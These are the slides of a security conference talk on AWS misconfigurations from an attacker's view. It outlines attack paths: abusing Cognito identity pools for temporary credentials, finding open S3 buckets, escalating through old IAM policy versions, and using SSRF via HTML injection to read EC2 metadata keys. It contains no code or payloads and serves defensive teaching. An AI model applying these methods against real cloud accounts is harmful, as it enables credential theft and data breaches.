Slide 1

Slide 1 text

Kavisha Sheth AWS (Mis)configuration from attacker’s eye-view

Slide 2

Slide 2 text

AWS (Mis)configuration from attacker’s eye-view About me ● Security Analyst @Appsecco. ● Listed as among top security researcher of the nation by NCIIPC. ● Curious person ● International speaker who talks around Cloud security , API security and Modern web-application.

Slide 3

Slide 3 text

AWS (Mis)configuration from attacker’s eye-view What’s all about? ● AWS Cognito Misconfiguration. ● S3 Misconfiguration that attackers love. ● Misconfigured IAM Policy. ● EC2 MIsconfigurations. ● How HTML injections can help to get AWS credentials.

Slide 4

Slide 4 text

AWS (Mis)configuration from attacker’s eye-view AWS Cognito (Mis)configuration

Slide 5

Slide 5 text

AWS (Mis)configuration from attacker’s eye-view AWS Cognito working https://docs.aws.amazon.com/cognito/latest/developerguide/what-is-amazon-cognito.html

Slide 6

Slide 6 text

AWS (Mis)configuration from attacker’s eye-view User Pools & Federated Identity Pools https://serverless-stack.com/chapters/cognito-user-pool-vs-identity-pool.html 1. User authenticates against a user pool. 2. The user pool assigns 3 JWT tokens (Id, Access, and Refresh) to the user. 3. The ID JWT is passed to the identity pool in order to receive temporary AWS credentials with roles assigned to the identity provider. 4. The user can then make calls to AWS services based on their privileges. Amazon Cognito has authenticated and unauthenticated mode to generate AWS temporary credentials for users.

Slide 7

Slide 7 text

What are the possible attack vectors? ● Misconfigured AWS Cognito Attributes. ● Hardcoded Identity Pool ID. ● AWS cognito misconfigured to allow sign up of new user. ● Identity Pool ID present in HTTP response. ● Liberal AWS permissions has been assigned. AWS (Mis)configuration from attacker’s eye-view

Slide 8

Slide 8 text

AWS (Mis)configuration from attacker’s eye-view Hardcoded Identity Pool ID Identity Pool Id getting disclosed in HTTP Response

Slide 9

Slide 9 text

How the disclosure of App Client ID, User Pool ID, Identity Pool ID, and Region information can help? How can I try to exploit? AWS (Mis)configuration from attacker’s eye-view

Slide 10

Slide 10 text

Try to fetch Temporary credential Using Python script Generate the temporary credentials through Boto3 script API call to look into HTTP request for to get IdentityID from IdentityPoolID API call: AWSCognitoIdentityService .GetCredentialsIdentity API call to look for in HTTP request to fetch temporary credentials after knowing IdentityID API call: AWSCognitoIdentityService.GetCred entialsIdentity Using Burpsuite A B AWS (Mis)configuration from attacker’s eye-view 1 2

Slide 11

Slide 11 text

AWS (Mis)configuration from attacker’s eye-view ● Check if application exposed some functionalities unintentionally via AWS Cognito misconfiguration. for example, AppClientId disclosed. ● Check if the confirmation email was sent to the attacker specified email along with the confirmation code. ● Check if the user account can be confirmed from the token received on the registered email. ● Check if Application validated a newly created user and returned access tokens. ● Authenticated access and ID token. These values could be used to generate temporary AWS credentials for authenticated identities. What if access to unauthenticated identities was disabled ?

Slide 12

Slide 12 text

● Sensitive details present in server responses, including Cognito Identity Pool Id. ● AWS cognito misconfigured to allow sign up of new user. ● Providing the liberal AWS permissions and that allows an unauthenticated user to access sensitive AWS services. ● Improper validation for Identity ID and allow to fetch temporary credentials What can go wrong ? AWS (Mis)configuration from attacker’s eye-view

Slide 13

Slide 13 text

AWS (Mis)configuration from attacker’s eye-view S3 (Mis)configuration

Slide 14

Slide 14 text

1. Allowing public access to bucket. 2.Defining “Full control” access to Authenticated AWS Users group. 3.Defining Bucket with a “read access” policy. 4.Enabling “Write” access to the “Everyone” group. 5. Forgetting to encrypt your AWS resource. AWS (Mis)configuration from attacker’s eye-view

Slide 15

Slide 15 text

Finding S3 Bucket ● Google search ● Google dork ● Shodan ● Censys ● Use discovery (OSINT) tools – Sublist3r and Amass ● Bruteforce name ● Shodan, Certificate Transparency Logs, Censys, numerous bucket finder scripts, GrayHat Warfare bucket search AWS (Mis)configuration from attacker’s eye-view

Slide 16

Slide 16 text

Publicly available Google Dork AWS (Mis)configuration from attacker’s eye-view

Slide 17

Slide 17 text

https://sonraisecurity.com/blog/misconfigured-aws-s3-bucket-leads-to-data-breach/ AWS (Mis)configuration from attacker’s eye-view

Slide 18

Slide 18 text

How (Mis)configured IAM Policy allows least privilege user to get admin level access? AWS (Mis)configuration from attacker’s eye-view

Slide 19

Slide 19 text

AWS (Mis)configuration from attacker’s eye-view Overly permissive user policies

Slide 20

Slide 20 text

Approach AWS (Mis)configuration from attacker’s eye-view

Slide 21

Slide 21 text

1. Multiple policy versions with overly permissive configuration for older version. 2. Overly permissive policy present. 3. Able to use overly permissive older version policy by making it as a default policy. What went wrong? AWS (Mis)configuration from attacker’s eye-view

Slide 22

Slide 22 text

EC2 (Mis)configuration AWS (Mis)configuration from attacker’s eye-view

Slide 23

Slide 23 text

● Is EC2 instance accessible to public user? ● Is there any port open? ● Is web application running on that EC2 instance ip address? ● Is default configuration being used? What to look for? AWS (Mis)configuration from attacker’s eye-view

Slide 24

Slide 24 text

Finding EC2 instance AWS (Mis)configuration from attacker’s eye-view

Slide 25

Slide 25 text

Web application running on port 80 AWS (Mis)configuration from attacker’s eye-view

Slide 26

Slide 26 text

AWS (Mis)configuration from attacker’s eye-view

Slide 27

Slide 27 text

S3 related permission and sensitive information

Slide 28

Slide 28 text

AWS (Mis)configuration from attacker’s eye-view Approach

Slide 29

Slide 29 text

1. Misconfigured firewall that allows EC2 instance publicly accessible. 2. Web Application hosted on EC2 instance doesn’t have input validation and trust on user supplied data to make requests from the server and that make web-application vulnerable to SSRF. 3. EC2 role with overly permissive policy. 4. Data storage in AWS S3 was not encrypted. 5. Storing credentials such as admin credentials in S3 bucket. What went wrong? AWS (Mis)configuration from attacker’s eye-view

Slide 30

Slide 30 text

AWS (Mis)configuration from attacker’s eye-view What are other attack vectors worth to look for ● Public Snapshots ● Non-public EC2 AMI ● Encrypted AMI ● Not using default VPC ● EC2 Instance Not In Public Subnet ● Unrestricted Outbound Access ● EC2 Reserved Instance Payment Pending ● Allowing meaningful ports to open without putting restrictions

Slide 31

Slide 31 text

How an attacker make use of HTML Injection to get AWS credentials ? AWS (Mis)configuration from attacker’s eye-view

Slide 32

Slide 32 text

https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90 AWS (Mis)configuration from attacker’s eye-view

Slide 33

Slide 33 text

Approach AWS (Mis)configuration from attacker’s eye-view

Slide 34

Slide 34 text

1. The user provided data was being consumed were not output encoded and input is not being sanitized and that make application to vulnerable to HTML Injection attack and also confirm that vulnerable to SSRF attack. 3. AWS hosted web application, so try to access to a set of AWS access keys by accessing the AWS EC2 metadata service via a SSRF vulnerability. 4. Able to access EC2 metadata as usage of IMDVS1. What went wrong? AWS (Mis)configuration from attacker’s eye-view

Slide 35

Slide 35 text

● Improper credentials handling ● Instance misconfiguration ● S3 misconfiguration ● Access control misconfiguration ● Exposure of resources via firewall ● Network security misconfiguration ● Insecure custom applications ● RDS Misconfigurations Misconfigurations that worth to look for AWS (Mis)configuration from attacker’s eye-view

Slide 36

Slide 36 text

Tools that can help to speedup procedure ● Scoutesuite ● Prowler ● S3-inspector ● Enumerate IAM ● Bucket finder ● Pacu ● aws_escalate AWS (Mis)configuration from attacker’s eye-view

Slide 37

Slide 37 text

References ● https://aws.amazon.com/premiumsupport/knowledge-center/cognito-user-pools-identity-pools/ ● https://docs.aws.amazon.com/cognito/latest/developerguide/what-is-amazon-cognito.html ● https://dev.to/cloudanix/top-13-aws-ec2-misconfigurations-to-avoid-in-2021-29 ● https://notsosecure.com/hacking-aws-cognito-misconfigurations/ ● https://andresriancho.com/wp-content/uploads/2019/06/whitepaper-internet-scale-analysis-of-a ws-cognito-security.pdf ● https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5 ec5d90 ● https://github.com/appsecco/attacking-cloudgoat2 AWS (Mis)configuration from attacker’s eye-view

Slide 38

Slide 38 text

AWS (Mis)configuration from attacker’s eye-view Thank you https://www.linkedin.com/in/kavisha-sheth/ https://twitter.com/sheth_kavisha